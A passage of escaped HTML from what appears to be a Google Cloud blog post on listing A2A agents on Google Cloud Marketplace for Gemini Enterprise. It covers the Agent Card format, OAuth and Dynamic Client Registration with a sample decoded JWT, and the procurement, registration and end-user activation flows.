&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;Discover agent entry points for sending messages or getting task execution status updates.&lt;/span&gt;&lt;/p&gt;
&lt;/li&gt;
&lt;li style="vertical-align: baseline;"&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;Determine the required authentication/authorization methods.&lt;/span&gt;&lt;/p&gt;
&lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;Here is an example Agent Card with definition below.&lt;/span&gt;&lt;/p&gt;&lt;/div&gt;
&lt;div class="block-code"&gt;&lt;dl&gt;
    &lt;dt&gt;code_block&lt;/dt&gt;
    &lt;dd&gt;&amp;lt;ListValue: [StructValue([(&amp;#x27;code&amp;#x27;, &amp;#x27;{\r\n    &amp;quot;name&amp;quot;: &amp;quot;AI Agent Example&amp;quot;,\r\n    &amp;quot;protocolVersion&amp;quot;: &amp;quot;1.0&amp;quot;,\r\n    &amp;quot;description&amp;quot;: &amp;quot;Marketplace agent example.&amp;quot;,\r\n    &amp;quot;url&amp;quot;: $AGENT_APP_URL,\r\n    &amp;quot;preferredTransport&amp;quot;: &amp;quot;JSONRPC&amp;quot;,\r\n    &amp;quot;provider&amp;quot;: {\r\n        &amp;quot;organization&amp;quot;: $AGENT_PROVIDER_ORGANIZATION,\r\n        &amp;quot;url&amp;quot;: $AGENT_PROVIDER_URL\r\n    },\r\n    &amp;quot;version&amp;quot;: &amp;quot;1.0.0&amp;quot;,\r\n    &amp;quot;capabilities&amp;quot;: {\r\n        &amp;quot;streaming&amp;quot;: false,\r\n        &amp;quot;pushNotifications&amp;quot;: false,\r\n        &amp;quot;extensions&amp;quot;: [\r\n            {\r\n                &amp;quot;uri&amp;quot;: &amp;quot;https://cloud.google.com/marketplace/docs/partners/ai-agents/setup-dcr&amp;quot;,\r\n                &amp;quot;params&amp;quot;: {\r\n                    &amp;quot;target_url&amp;quot;: $AGENT_DCR_URL\r\n                }\r\n            }\r\n        ]\r\n    },\r\n    &amp;quot;defaultInputModes&amp;quot;: [\r\n        &amp;quot;application/json&amp;quot;\r\n    ],\r\n    &amp;quot;defaultOutputModes&amp;quot;: [\r\n        &amp;quot;application/json&amp;quot;\r\n    ],\r\n    &amp;quot;skills&amp;quot;: [\r\n        {\r\n            &amp;quot;id&amp;quot;: &amp;quot;current_time_generation&amp;quot;,\r\n            &amp;quot;name&amp;quot;: &amp;quot;Current time generation&amp;quot;,\r\n            &amp;quot;description&amp;quot;: &amp;quot;Generates a current time.&amp;quot;,\r\n            &amp;quot;tags&amp;quot;: [\r\n                &amp;quot;time&amp;quot;\r\n            ],\r\n            &amp;quot;examples&amp;quot;: [\r\n                &amp;quot;What time is it?&amp;quot;\r\n            ]\r\n        }\r\n    ],\r\n    &amp;quot;supportsAuthenticatedExtendedCard&amp;quot;: false,\r\n    &amp;quot;iconUrl&amp;quot;: $AGENT_ICON_URL,\r\n    &amp;quot;security&amp;quot;: [\r\n        {\r\n            &amp;quot;oauth2&amp;quot;: [\r\n                $AUTH_SCOPE\r\n            ]\r\n        }\r\n    ],\r\n    &amp;quot;securitySchemes&amp;quot;: {\r\n        &amp;quot;oauth2&amp;quot;: {\r\n            &amp;quot;type&amp;quot;: &amp;quot;oauth2&amp;quot;,\r\n            &amp;quot;flows&amp;quot;: {\r\n                &amp;quot;authorizationCode&amp;quot;: {\r\n                    &amp;quot;authorizationUrl&amp;quot;: $AUTHZ_URL,\r\n                    &amp;quot;tokenUrl&amp;quot;: $TOKEN_URL,\r\n                    &amp;quot;refreshUrl&amp;quot;: $REFRESH_URL,\r\n                    &amp;quot;scopes&amp;quot;: {\r\n                        $AUTH_SCOPE: $AUTH_SCOPE_DESCRIPTION \r\n                  }\r\n                }\r\n            }\r\n        }\r\n    }\r\n}&amp;#x27;), (&amp;#x27;language&amp;#x27;, &amp;#x27;&amp;#x27;), (&amp;#x27;caption&amp;#x27;, &amp;lt;wagtail.rich_text.RichText object at 0x7fa08d21ce20&amp;gt;)])]&amp;gt;&lt;/dd&gt;
&lt;/dl&gt;&lt;/div&gt;
&lt;div class="block-paragraph_advanced"&gt;&lt;ul&gt;
&lt;li&gt;&lt;span style="vertical-align: baseline;"&gt;$AGENT_APP_URL - A required field representing the base URL endpoint where the A2A agent can be reached. All API calls to the agent will use this as the base path.&lt;/span&gt;&lt;/li&gt;
&lt;li&gt;&lt;span style="vertical-align: baseline;"&gt;$AGENT_PROVIDER_ORGANIZATION - A required field representing the agent provider's organization. &lt;/span&gt;&lt;/li&gt;
&lt;li&gt;&lt;span style="vertical-align: baseline;"&gt;$AGENT_PROVIDER_URL - A required field representing the agent provider's website or relevant documentation.&lt;/span&gt;&lt;/li&gt;
&lt;li&gt;&lt;span style="vertical-align: baseline;"&gt;$AGENT_DCR_URL - A required field if the agent implements Dynamic Client Registration (DCR).&lt;/span&gt;&lt;/li&gt;
&lt;li&gt;&lt;span style="vertical-align: baseline;"&gt;$AGENT_ICON_URL - An optional field providing a URL to an image file to be used as an icon for the agent. If provided, it will be displayed in the Gemini Enterprise app.  &lt;/span&gt;&lt;/li&gt;
&lt;li&gt;&lt;span style="vertical-align: baseline;"&gt;$AUTH_SCOPE - An array of strings listing the scope names required for the client to access the agent's operations.&lt;/span&gt;&lt;/li&gt;
&lt;li&gt;&lt;span style="vertical-align: baseline;"&gt;$AUTH_SCOPE_DESCRIPTION - Scope description. Example: "Permission to retrieve email address of the user.”&lt;/span&gt;&lt;/li&gt;
&lt;li&gt;&lt;span style="vertical-align: baseline;"&gt;$AUTHZ_URL - A required part of the OAuth2 security scheme definition for the Authorization Code flow. It specifies the URL of the authorization server's endpoint used to obtain an authorization code from the resource owner. This follows the OpenAPI Specification.&lt;/span&gt;&lt;/li&gt;
&lt;li&gt;&lt;span style="vertical-align: baseline;"&gt;$TOKEN_URL, $REFRESH_URL - URLs for the client to exchange the authorization code for an access token and a refresh token (can be the same).                &lt;/span&gt;&lt;/li&gt;
&lt;/ul&gt;
&lt;h2&gt;&lt;strong style="vertical-align: baseline;"&gt;Authentication and authorization&lt;/strong&gt;&lt;/h2&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;Implement authentication and authorization for your agent according to the &lt;/span&gt;&lt;a href="https://a2a-protocol.org/latest/" rel="noopener" target="_blank"&gt;&lt;span style="text-decoration: underline; vertical-align: baseline;"&gt;A2A protocol&lt;/span&gt;&lt;/a&gt;&lt;span style="vertical-align: baseline;"&gt;. To allow the Gemini Enterprise app to call your agent, you must establish one of these two methods for your agents:&lt;/span&gt;&lt;/p&gt;
&lt;ol&gt;
&lt;li style="vertical-align: baseline;"&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;Public Access: No authentication required. Suitable only for agents that do not access any user data or sensitive resources.&lt;/span&gt;&lt;/p&gt;
&lt;/li&gt;
&lt;li style="vertical-align: baseline;"&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;OAuth 2.0 Authorization Code Grant Flow: This is the standard flow for delegated user authorization. Users will be prompted to authorize your agent to access their data or act on their behalf.&lt;/span&gt;&lt;/p&gt;
&lt;/li&gt;
&lt;/ol&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;Dynamic Client Registration (DCR)&lt;/span&gt;&lt;/p&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;Traditionally, connecting a third-party app to an enterprise system required manual copying of Client IDs and secrets. &lt;/span&gt;&lt;a href="https://www.rfc-editor.org/rfc/rfc7591.html" rel="noopener" target="_blank"&gt;&lt;span style="text-decoration: underline; vertical-align: baseline;"&gt;DCR&lt;/span&gt;&lt;/a&gt;&lt;span style="vertical-align: baseline;"&gt; eliminates this by allowing Gemini Enterprise to programmatically register itself as an OAuth client with your agent's authorization server.&lt;/span&gt;&lt;/p&gt;
&lt;h4&gt;&lt;span style="vertical-align: baseline;"&gt;How the DCR Flow Works:&lt;/span&gt;&lt;/h4&gt;
&lt;ol&gt;
&lt;li style="vertical-align: baseline;"&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;Discovery: The Gemini Enterprise app reads your Agent Card to find the DCR endpoint.&lt;/span&gt;&lt;/p&gt;
&lt;/li&gt;
&lt;li style="vertical-align: baseline;"&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;Request: Google sends an HTTP POST to your endpoint containing a &lt;/span&gt;&lt;span style="vertical-align: baseline;"&gt;software_statement&lt;/span&gt;&lt;span style="vertical-align: baseline;"&gt; which is a cryptographically signed JSON Web Token (JWT).&lt;/span&gt;&lt;/p&gt;
&lt;/li&gt;
&lt;li style="vertical-align: baseline;"&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;Validation: Your backend verifies the JWT signature using Google's public keys to ensure the request is authentic.&lt;/span&gt;&lt;/p&gt;
&lt;/li&gt;
&lt;li style="vertical-align: baseline;"&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;Provisioning: Upon success, your server creates a new OpenID Connect (OIDC) application in your identity provider (e.g., Okta) and returns the &lt;/span&gt;&lt;span style="vertical-align: baseline;"&gt;client_id&lt;/span&gt;&lt;span style="vertical-align: baseline;"&gt; and &lt;/span&gt;&lt;span style="vertical-align: baseline;"&gt;client_secret&lt;/span&gt;&lt;span style="vertical-align: baseline;"&gt; to Gemini Enterprise.&lt;/span&gt;&lt;/p&gt;
&lt;/li&gt;
&lt;/ol&gt;&lt;/div&gt;
&lt;div class="block-code"&gt;&lt;dl&gt;
    &lt;dt&gt;code_block&lt;/dt&gt;
    &lt;dd&gt;&amp;lt;ListValue: [StructValue([(&amp;#x27;code&amp;#x27;, &amp;#x27;DCR Request\r\n{\r\n    &amp;quot;software_statement&amp;quot;: &amp;quot;eyJhbGciOiJSUzI1NiIsImtpZCI6ImY1OTIwZDJmMjIyYjNjMTE3Y2MyZmQzZmQxYWJjNzM...&amp;quot;\r\n}\r\n\r\nJWT Decoded\r\nHere is the decoded value of software_statement parameter:\r\n\r\nHeader:\r\n{\r\n    &amp;quot;alg&amp;quot;: &amp;quot;RS256&amp;quot;,\r\n    &amp;quot;kid&amp;quot;: &amp;quot;f5920d2f222b3c117cc2fd3fd1abc7367fd00402&amp;quot;,\r\n    &amp;quot;typ&amp;quot;: &amp;quot;JWT&amp;quot;\r\n}\r\nPayload:\r\n{\r\n    &amp;quot;aud&amp;quot;: &amp;quot;https://your-provider.com&amp;quot;,\r\n    &amp;quot;auth_app_redirect_uris&amp;quot;: [\r\n        &amp;quot;https://vertexaisearch.cloud.google.com/oauth-redirect&amp;quot;\r\n    ],\r\n    &amp;quot;exp&amp;quot;: 1766773074,\r\n    &amp;quot;google&amp;quot;: {\r\n        &amp;quot;order&amp;quot;: &amp;quot;xxxxxxxx-c3bc3976a8e0&amp;quot;\r\n    },\r\n    &amp;quot;iat&amp;quot;: 1766772774,\r\n    &amp;quot;iss&amp;quot;: &amp;quot;https://www.googleapis.com/service_accounts/v1/metadata/x509/cloud-agentspace@system.gserviceaccount.com&amp;quot;,\r\n    &amp;quot;sub&amp;quot;: &amp;quot;xxxxxxxx-xxxx-xxxx-xxxx-4656e5b81fe8&amp;quot;\r\n}\r\nDCR Response\r\n{\r\n    &amp;quot;client_id&amp;quot;: $CLIENT_ID,\r\n    &amp;quot;client_secret&amp;quot;: $CLIENT_SECRET,\r\n    &amp;quot;client_secret_expires_at&amp;quot;: 0\r\n}&amp;#x27;), (&amp;#x27;language&amp;#x27;, &amp;#x27;&amp;#x27;), (&amp;#x27;caption&amp;#x27;, &amp;lt;wagtail.rich_text.RichText object at 0x7fa08ec7a340&amp;gt;)])]&amp;gt;&lt;/dd&gt;
&lt;/dl&gt;&lt;/div&gt;
&lt;div class="block-paragraph_advanced"&gt;&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;Note: Validating the JWT ensures the request is from Google, but you must cross-reference the &lt;/span&gt;&lt;span style="vertical-align: baseline;"&gt;google.order&lt;/span&gt;&lt;span style="vertical-align: baseline;"&gt; ID against your database to ensure the user has actually paid.&lt;/span&gt;&lt;/p&gt;
&lt;h2&gt;&lt;span style="vertical-align: baseline;"&gt;Step 4: Publish your agent listing on Marketplace&lt;/span&gt;&lt;/h2&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;Once you’ve built your agents, you will need to publish and offer them on Google Cloud Marketplace. This is where you describe your agent and define availability and pricing models. The seller journey begins in the &lt;/span&gt;&lt;a href="https://docs.cloud.google.com/marketplace/docs/partners/access-control"&gt;&lt;span style="text-decoration: underline; vertical-align: baseline;"&gt;Producer Portal&lt;/span&gt;&lt;/a&gt;&lt;span style="vertical-align: baseline;"&gt; accessible through Google Cloud Console:&lt;/span&gt;&lt;/p&gt;
&lt;ol&gt;
&lt;li style="vertical-align: baseline;"&gt;
&lt;p&gt;&lt;strong style="vertical-align: baseline;"&gt;Select Solution Type:&lt;/strong&gt;&lt;span style="vertical-align: baseline;"&gt; Choose "&lt;/span&gt;&lt;a href="https://docs.cloud.google.com/marketplace/docs/partners/ai-agents"&gt;&lt;span style="text-decoration: underline; vertical-align: baseline;"&gt;AI Agent as a Service&lt;/span&gt;&lt;/a&gt;&lt;span style="vertical-align: baseline;"&gt;" as the product type in the Producer portal. &lt;/span&gt;&lt;/p&gt;
&lt;/li&gt;
&lt;li style="vertical-align: baseline;"&gt;
&lt;p&gt;&lt;strong style="vertical-align: baseline;"&gt;Upload Agent Card: &lt;/strong&gt;&lt;span style="vertical-align: baseline;"&gt;Provide the Agent Card JSON file via a Google Cloud Storage (GCS) bucket.&lt;/span&gt;&lt;/p&gt;
&lt;/li&gt;
&lt;li style="vertical-align: baseline;"&gt;
&lt;p&gt;&lt;strong style="vertical-align: baseline;"&gt;Availability:&lt;/strong&gt;&lt;span style="vertical-align: baseline;"&gt; Decide whether the AI agent listing can be purchased through publicly available pricing (self-service) or available via private offer only.&lt;/span&gt;&lt;/p&gt;
&lt;/li&gt;
&lt;li style="vertical-align: baseline;"&gt;
&lt;p&gt;&lt;strong style="vertical-align: baseline;"&gt;Pricing:&lt;/strong&gt;&lt;span style="vertical-align: baseline;"&gt; Create your pricing plan and choose the &lt;/span&gt;&lt;a href="https://docs.cloud.google.com/marketplace/docs/partners/ai-agents/choose-pricing"&gt;&lt;span style="text-decoration: underline; vertical-align: baseline;"&gt;pricing model&lt;/span&gt;&lt;/a&gt;&lt;span style="vertical-align: baseline;"&gt; you want to use to monetize the agent through Marketplace. &lt;/span&gt;&lt;/p&gt;
&lt;/li&gt;
&lt;li style="vertical-align: baseline;"&gt;
&lt;p&gt;&lt;strong style="vertical-align: baseline;"&gt;Technical Integration:&lt;/strong&gt;&lt;span style="vertical-align: baseline;"&gt; Configure the backend procurement. No frontend integration is required for this solution type.&lt;/span&gt;&lt;/p&gt;
&lt;/li&gt;
&lt;li style="vertical-align: baseline;"&gt;
&lt;p&gt;&lt;strong style="vertical-align: baseline;"&gt;Validation and End-to-End testing:&lt;/strong&gt;&lt;span style="vertical-align: baseline;"&gt; Google Cloud reviews the agent's functionality, security, and pricing model before it is published to the catalog.&lt;/span&gt;&lt;/p&gt;
&lt;/li&gt;
&lt;li style="vertical-align: baseline;"&gt;
&lt;p&gt;&lt;strong style="vertical-align: baseline;"&gt;Publish: &lt;/strong&gt;&lt;span style="vertical-align: baseline;"&gt;Agent is now successfully published and available in &lt;/span&gt;&lt;a href="https://console.cloud.google.com/marketplace/browse?filter=solution-type:ai-agent-service"&gt;&lt;span style="text-decoration: underline; vertical-align: baseline;"&gt;Google Cloud Marketplace&lt;/span&gt;&lt;/a&gt;&lt;span style="vertical-align: baseline;"&gt;.&lt;/span&gt;&lt;/p&gt;
&lt;/li&gt;
&lt;/ol&gt;
&lt;h2&gt;&lt;span style="vertical-align: baseline;"&gt;Step 5: Managing transactions and registrations in Marketplace and the Gemini Enterprise App &lt;/span&gt;&lt;/h2&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;There are distinct phases to the procurement and registration lifecycle of agents on Google Cloud Marketplace and the Gemini Enterprise app, which is critical for establishing strict enterprise governance, preventing shadow IT, and ensuring seamless compliance across the organization. A secured chain of custody is managed across three key personas: the &lt;/span&gt;&lt;a href="https://docs.cloud.google.com/billing/docs/how-to/billing-access#billing.admin"&gt;&lt;strong style="text-decoration: underline; vertical-align: baseline;"&gt;Billing Administrator&lt;/strong&gt;&lt;/a&gt;&lt;span style="vertical-align: baseline;"&gt;, who maintains financial oversight by controlling procurement and spending on Google Cloud Marketplace; the &lt;/span&gt;&lt;a href="https://docs.cloud.google.com/iam/docs/roles-permissions/discoveryengine#discoveryengine.admin"&gt;&lt;strong style="text-decoration: underline; vertical-align: baseline;"&gt;Discovery Engine Administrator&lt;/strong&gt;&lt;/a&gt;&lt;span style="vertical-align: baseline;"&gt;, who acts as the technical gatekeeper by securely registering verified agents and determining organizational access in Gemini Enterprise; and the &lt;/span&gt;&lt;a href="https://docs.cloud.google.com/iam/docs/roles-permissions/discoveryengine#discoveryengine.user"&gt;&lt;strong style="text-decoration: underline; vertical-align: baseline;"&gt;Discovery Engine User&lt;/strong&gt;&lt;/a&gt;&lt;span style="vertical-align: baseline;"&gt;, who can safely leverage the agent's full capabilities within their Gemini Enterprise app only after completing proper identity authorization.&lt;/span&gt;&lt;/p&gt;
&lt;h3&gt;&lt;span style="vertical-align: baseline;"&gt;1. Procurement Flow - Async (Google Cloud Marketplace) &lt;/span&gt;&lt;/h3&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;Once listed, the backend procurement sequence follows these steps:&lt;/span&gt;&lt;/p&gt;
&lt;ol&gt;
&lt;li style="vertical-align: baseline;"&gt;
&lt;p&gt;&lt;strong style="vertical-align: baseline;"&gt;Trigger:&lt;/strong&gt;&lt;span style="vertical-align: baseline;"&gt; A customer with&lt;/span&gt; &lt;a href="https://docs.cloud.google.com/billing/docs/how-to/billing-access"&gt;&lt;span style="text-decoration: underline; vertical-align: baseline;"&gt;Billing Administrator&lt;/span&gt;&lt;/a&gt;&lt;span style="vertical-align: baseline;"&gt; privileges clicks&lt;/span&gt;&lt;strong style="vertical-align: baseline;"&gt; &lt;/strong&gt;&lt;span style="vertical-align: baseline;"&gt;"Subscribe" (for self-serve listings) or accepts a "Private Offer" (for tailored private offer only listings).&lt;/span&gt;&lt;/p&gt;
&lt;/li&gt;
&lt;li style="vertical-align: baseline;"&gt;
&lt;p&gt;&lt;strong style="vertical-align: baseline;"&gt;Notification:&lt;/strong&gt;&lt;span style="vertical-align: baseline;"&gt; Google sends a Pub/Sub notification to your environment.&lt;/span&gt;&lt;/p&gt;
&lt;/li&gt;
&lt;li style="vertical-align: baseline;"&gt;
&lt;p&gt;&lt;strong style="vertical-align: baseline;"&gt;Approval and storage:&lt;/strong&gt;&lt;span style="vertical-align: baseline;"&gt; Your integrated marketplace handler approves the account and the entitlement via the&lt;/span&gt; &lt;a href="https://docs.cloud.google.com/marketplace/docs/partners/ai-agents/technical-integration"&gt;&lt;span style="text-decoration: underline; vertical-align: baseline;"&gt;Partner Procurement API&lt;/span&gt;&lt;/a&gt;&lt;span style="vertical-align: baseline;"&gt;.&lt;/span&gt;&lt;/p&gt;
&lt;/li&gt;
&lt;li style="vertical-align: baseline;"&gt;
&lt;p&gt;&lt;strong style="vertical-align: baseline;"&gt;Activation:&lt;/strong&gt;&lt;span style="vertical-align: baseline;"&gt; The handler records the transaction by storing the unique Order ID in a database like Firestore, instantly activating the subscription or offer for the customer.&lt;/span&gt;&lt;/p&gt;
&lt;/li&gt;
&lt;/ol&gt;&lt;/div&gt;
&lt;div class="block-image_full_width"&gt;






  
    &lt;div class="article-module h-c-page"&gt;
      &lt;div class="h-c-grid"&gt;
  

    &lt;figure class="article-image--large
      
      
        h-c-grid__col
        h-c-grid__col--6 h-c-grid__col--offset-3
        
        
      "&gt;

      
      
        
        &lt;img alt="2. Procurement Flow - Async (Google Cloud Marketplace)" src="https://storage.googleapis.com/gweb-cloudblog-publish/original_images/2._Procurement_Flow_-_Async_Google_Cloud_Marketplace.gif" /&gt;
        
        &lt;/a&gt;
      
    &lt;/figure&gt;

  
      &lt;/div&gt;
    &lt;/div&gt;
  




&lt;/div&gt;
&lt;div class="block-paragraph_advanced"&gt;&lt;p&gt;&lt;span style="font-style: italic; vertical-align: baseline;"&gt;As shown above, the Billing Administrator executes a one-click subscription to activate the &lt;/span&gt;&lt;a href="https://console.cloud.google.com/marketplace/product/lovable-public/lovable-agent-for-gemini-enterprise"&gt;&lt;strong style="font-style: italic; text-decoration: underline; vertical-align: baseline;"&gt;Lovable Agent&lt;/strong&gt;&lt;/a&gt;&lt;strong style="font-style: italic; vertical-align: baseline;"&gt; &lt;/strong&gt;&lt;span style="font-style: italic; vertical-align: baseline;"&gt;free plan alongside their already active SaaS subscription procured through Cloud Marketplace. &lt;/span&gt;&lt;/p&gt;
&lt;h3&gt;&lt;span style="vertical-align: baseline;"&gt;2. Registration flow - sync (Gemini Enterprise) &lt;/span&gt;&lt;/h3&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;After successful procurement, the customer's administrator links the purchase to their actual Gemini Enterprise app environment:&lt;/span&gt;&lt;/p&gt;
&lt;ol&gt;
&lt;li style="vertical-align: baseline;"&gt;
&lt;p&gt;&lt;strong style="vertical-align: baseline;"&gt;Redirect to Gemini Enterprise:&lt;/strong&gt;&lt;span style="vertical-align: baseline;"&gt; The &lt;/span&gt;&lt;a href="https://docs.cloud.google.com/iam/docs/roles-permissions/discoveryengine#discoveryengine.admin"&gt;&lt;span style="text-decoration: underline; vertical-align: baseline;"&gt;Discovery Engine Administrator &lt;/span&gt;&lt;/a&gt;&lt;span style="vertical-align: baseline;"&gt; will see a "Go to Gemini Enterprise" option directly on the procured Marketplace listing.&lt;/span&gt;&lt;/p&gt;
&lt;/li&gt;
&lt;li style="vertical-align: baseline;"&gt;
&lt;p&gt;&lt;strong style="vertical-align: baseline;"&gt;Project Verification:&lt;/strong&gt;&lt;span style="vertical-align: baseline;"&gt; Clicking this prompts the administrator to log into the Google Cloud project where their Gemini Enterprise licenses are allocated. Note that the customer must ensure this destination Google Cloud project is &lt;/span&gt;&lt;a href="https://docs.cloud.google.com/billing/docs/how-to/view-linked"&gt;&lt;span style="text-decoration: underline; vertical-align: baseline;"&gt;actively linked to the specific billing account&lt;/span&gt;&lt;/a&gt;&lt;span style="vertical-align: baseline;"&gt; used during procurement.&lt;/span&gt;&lt;/p&gt;
&lt;/li&gt;
&lt;li style="vertical-align: baseline;"&gt;
&lt;p&gt;&lt;strong style="vertical-align: baseline;"&gt;DCR Handshake:&lt;/strong&gt;&lt;span style="vertical-align: baseline;"&gt; The Discovery Engine Administrator configures the agent within the Gemini Enterprise app. At this point, your Dynamic Client Registration (DCR) logic validates the incoming JWT's Order ID against your Firestore records. If the IDs match, the secure registration completes successfully.&lt;/span&gt;&lt;/p&gt;
&lt;/li&gt;
&lt;li style="vertical-align: baseline;"&gt;
&lt;p&gt;&lt;strong style="vertical-align: baseline;"&gt;Agent successfully Registered&lt;/strong&gt;&lt;span style="vertical-align: baseline;"&gt;: Agent is now successfully registered in Gemini Enterprise. Discovery Engine Administrator can now decide whom to give &lt;/span&gt;&lt;a href="https://docs.cloud.google.com/gemini/enterprise/docs/share-custom-agents#share_an_agent"&gt;&lt;span style="text-decoration: underline; vertical-align: baseline;"&gt;access&lt;/span&gt;&lt;/a&gt;&lt;span style="vertical-align: baseline;"&gt; to the agent. &lt;/span&gt;&lt;/p&gt;
&lt;/li&gt;
&lt;/ol&gt;&lt;/div&gt;
&lt;div class="block-image_full_width"&gt;






  
    &lt;div class="article-module h-c-page"&gt;
      &lt;div class="h-c-grid"&gt;
  

    &lt;figure class="article-image--large
      
      
        h-c-grid__col
        h-c-grid__col--6 h-c-grid__col--offset-3
        
        
      "&gt;

      
      
        
        &lt;img alt="3. Registration flow -sync (Gemini Enterprise)" src="https://storage.googleapis.com/gweb-cloudblog-publish/original_images/3._Registration_flow_-sync_Gemini_Enterprise.gif" /&gt;
        
        &lt;/a&gt;
      
    &lt;/figure&gt;

  
      &lt;/div&gt;
    &lt;/div&gt;
  




&lt;/div&gt;
&lt;div class="block-paragraph_advanced"&gt;&lt;p&gt;&lt;span style="font-style: italic; vertical-align: baseline;"&gt;Following procurement, the Discovery Engine Administrator registers the Lovable Agent into the Gemini Enterprise app to make it available to authorized users across an organization.&lt;/span&gt;&lt;/p&gt;
&lt;h3&gt;&lt;span style="vertical-align: baseline;"&gt;3. End-User Activation Flow (Gemini Enterprise) &lt;/span&gt;&lt;/h3&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;Once the agent is securely registered, it becomes discoverable to your target enterprise users:&lt;/span&gt;&lt;/p&gt;
&lt;ul&gt;
&lt;li style="vertical-align: baseline;"&gt;
&lt;p&gt;&lt;strong style="vertical-align: baseline;"&gt;Gemini Enterprise in-app agent discovery and requests: &lt;/strong&gt;&lt;span style="vertical-align: baseline;"&gt;End users have the ability to browse and directly request access to any available&lt;/span&gt;&lt;a href="https://cloud.google.com/blog/products/ai-machine-learning/partner-built-agents-available-in-gemini-enterprise"&gt;&lt;span style="vertical-align: baseline;"&gt; &lt;/span&gt;&lt;/a&gt;&lt;span style="vertical-align: baseline;"&gt;partner-built agent from Cloud Marketplace within the Agent Gallery in the Gemini Enterprise app. When a request is submitted, the &lt;/span&gt;&lt;a href="https://docs.cloud.google.com/iam/docs/roles-permissions/discoveryengine#discoveryengine.admin"&gt;&lt;span style="text-decoration: underline; vertical-align: baseline;"&gt;Discovery Engine Administrator&lt;/span&gt;&lt;/a&gt;&lt;span style="vertical-align: baseline;"&gt; can review the request and coordinate directly with the organization’s &lt;/span&gt;&lt;a href="https://docs.cloud.google.com/billing/docs/how-to/billing-access#billing.admin"&gt;&lt;span style="text-decoration: underline; vertical-align: baseline;"&gt;Billing Administrator&lt;/span&gt;&lt;/a&gt;&lt;span style="vertical-align: baseline;"&gt; to procure the agent through Google Cloud Marketplace, and, if already procured and registered, can &lt;/span&gt;&lt;a href="https://www.google.com/search?q=https://docs.google.com/gemini/enterprise/docs/register-and-manage-marketplace-agents%23review-access-requests" rel="noopener" target="_blank"&gt;&lt;span style="text-decoration: underline; vertical-align: baseline;"&gt;give access to the end user&lt;/span&gt;&lt;/a&gt;&lt;span style="vertical-align: baseline;"&gt;.&lt;/span&gt;&lt;/p&gt;
&lt;/li&gt;
&lt;li style="vertical-align: baseline;"&gt;
&lt;p&gt;&lt;strong style="vertical-align: baseline;"&gt;Access:&lt;/strong&gt;&lt;span style="vertical-align: baseline;"&gt; Once access is given to the agent, any end user with an active Gemini Enterprise app account and &lt;/span&gt;&lt;a href="https://docs.cloud.google.com/iam/docs/roles-permissions/discoveryengine#discoveryengine.user"&gt;&lt;span style="text-decoration: underline; vertical-align: baseline;"&gt;Discovery Engine User&lt;/span&gt;&lt;/a&gt;&lt;span style="vertical-align: baseline;"&gt; role and license will be able to invoke the agent within their Gemini Enterprise app.&lt;/span&gt;&lt;/p&gt;
&lt;/li&gt;
&lt;li style="vertical-align: baseline;"&gt;
&lt;p&gt;&lt;strong style="vertical-align: baseline;"&gt;Authorization:&lt;/strong&gt;&lt;span style="vertical-align: baseline;"&gt; Upon the first interaction, the user will be prompted to complete an OAuth authorization by inputting their partner-system username and password. Once authenticated, they can seamlessly leverage the agent's full capabilities from the Gemini Enterprise app chat interface.&lt;/span&gt;&lt;/p&gt;
&lt;/li&gt;
&lt;/ul&gt;&lt;/div&gt;
&lt;div class="block-image_full_width"&gt;






  
    &lt;div class="article-module h-c-page"&gt;
      &lt;div class="h-c-grid"&gt;
  

    &lt;figure class="article-image--large
      
      
        h-c-grid__col
        h-c-grid__col--6 h-c-grid__col--offset-3
        
        
      "&gt;

      
      
        
        &lt;img alt="4. End-User Activation Flow (Gemini Enterprise)" src="https://storage.googleapis.com/gweb-cloudblog-publish/original_images/4._End-User_Activation_Flow_Gemini_Enterprise.gif" /&gt;
        
        &lt;/a&gt;
      
    &lt;/figure&gt;

  
      &lt;/div&gt;
    &lt;/div&gt;
  




&lt;/div&gt;
&lt;div class="block-paragraph_advanced"&gt;&lt;p&gt;&lt;span style="font-style: italic; vertical-align: baseline;"&gt;An end user seamlessly invokes the&lt;/span&gt; &lt;a href="https://console.cloud.google.com/marketplace/product/lovable-public/lovable-agent-for-gemini-enterprise"&gt;&lt;span style="font-style: italic; text-decoration: underline; vertical-align: baseline;"&gt;Lovable Agent&lt;/span&gt;&lt;/a&gt;&lt;span style="font-style: italic; vertical-align: baseline;"&gt; inside the Gemini Enterprise app, completes the one-time partner authorization prompt, and initiates a live conversational task workflow.&lt;/span&gt;&lt;/p&gt;&lt;/div&gt;
&lt;div class="block-image_full_width"&gt;






  
    &lt;div class="article-module h-c-page"&gt;
      &lt;div class="h-c-grid"&gt;
  

    &lt;figure class="article-image--large
      
      
        h-c-grid__col
        h-c-grid__col--6 h-c-grid__col--offset-3
        
        
      "&gt;

      
      
        
        &lt;img alt="5. End-User Activation Flow (Gemini Enterprise)" src="https://storage.googleapis.com/gweb-cloudblog-publish/original_images/5._End-User_Activation_Flow_Gemini_Enterprise.gif" /&gt;
        
        &lt;/a&gt;
      
    &lt;/figure&gt;

  
      &lt;/div&gt;
    &lt;/div&gt;
  




&lt;/div&gt;
